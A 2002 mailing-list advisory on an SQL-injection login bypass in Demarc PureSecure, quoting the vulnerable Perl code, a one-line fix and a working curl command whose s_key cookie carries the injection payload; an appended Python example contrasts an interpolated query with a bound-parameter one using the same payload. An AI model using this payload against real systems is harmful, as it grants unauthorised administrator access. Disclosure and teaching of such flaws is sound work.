From: pokleyzz sakamaniaka (pokleyzzhotmail.com)
Date: Mon Apr 15 2002 - 02:32:18 CDT


    Demarc PureSecure (http://www.demarc.org) is an
    all-inclusive network monitoring solution that allows
    you to monitor an entire network of servers from one
    powerful web interface.

    A user can bypass login and get admin status by SQL
    injection through the cookie s_key.

    --------- line 319 ------------------------------
    elsif (($cookies{'s_key'}) && ($cookies{'s_key'}->value)){
            $logged_in_as = &check_login($cookies{'s_key'}->value);
            if (!$logged_in_as){
                       &print_login_screen;
                       &safe_exit;
            }
    -----------------------------------------------------

    s_key will be used for the SQL query in function
    check_login (line 6114)

    --------- line 6114 ---------------------------------
    $sql_query = " SELECT \
            f1,f2,f3,admin,username,UNIX_TIMESTAMP(current_login_timedate) AS LOGINTIME \
            FROM \
            dm_sessions \
            WHERE current_session_id = '$session_id' ";
    -----------------------------------------------------

    -=solution=-
    line 6113: &safe_slash(\$session_id);

    using curl (http://curl.haxx.se/download/):
    curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<host>/dm/demarc


    http://www.inetd-secure.net
    http://www.mybsd.org
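
The following is an added example, not part of the original post and not Demarc code. It shows the session lookup from line 6114 in its interpolated form beside a bound-parameter form, which is a different fix from the post's safe_slash escaping. Python with an in-memory SQLite database stands in for the Perl/MySQL original; the function names, the reduced column set and the table row are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the dm_sessions table named in the post."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE dm_sessions ("
        "current_session_id TEXT, username TEXT, admin INTEGER)"
    )
    # Constructed sample row: one logged-in admin session.
    db.execute("INSERT INTO dm_sessions VALUES ('3f9c1e7a', 'alice', 1)")
    return db


def check_login_interpolated(db, session_id):
    """Same pattern as line 6114: the cookie value becomes part of the SQL text."""
    sql = ("SELECT username, admin FROM dm_sessions "
           "WHERE current_session_id = '%s'" % session_id)
    return db.execute(sql).fetchone()


def check_login_bound(db, session_id):
    """The cookie value is a bound parameter, so it is only compared as data."""
    sql = ("SELECT username, admin FROM dm_sessions "
           "WHERE current_session_id = ?")
    return db.execute(sql, (session_id,)).fetchone()


# Decoded s_key value from the curl command in the post. The MySQL comment
# marker '#' is written as '--' here because SQLite has no '#' comments.
COOKIE_FROM_POST = "' OR current_session_id like '%'--"

if __name__ == "__main__":
    db = make_db()
    for label, value in (("valid session id", "3f9c1e7a"),
                         ("cookie from the post", COOKIE_FROM_POST)):
        print(label)
        print("  interpolated:", check_login_interpolated(db, value))
        print("  bound:       ", check_login_bound(db, value))
```

With the bound form, the lookup returns no row unless the cookie exactly equals a stored session id, so check_login would fall through to the login screen.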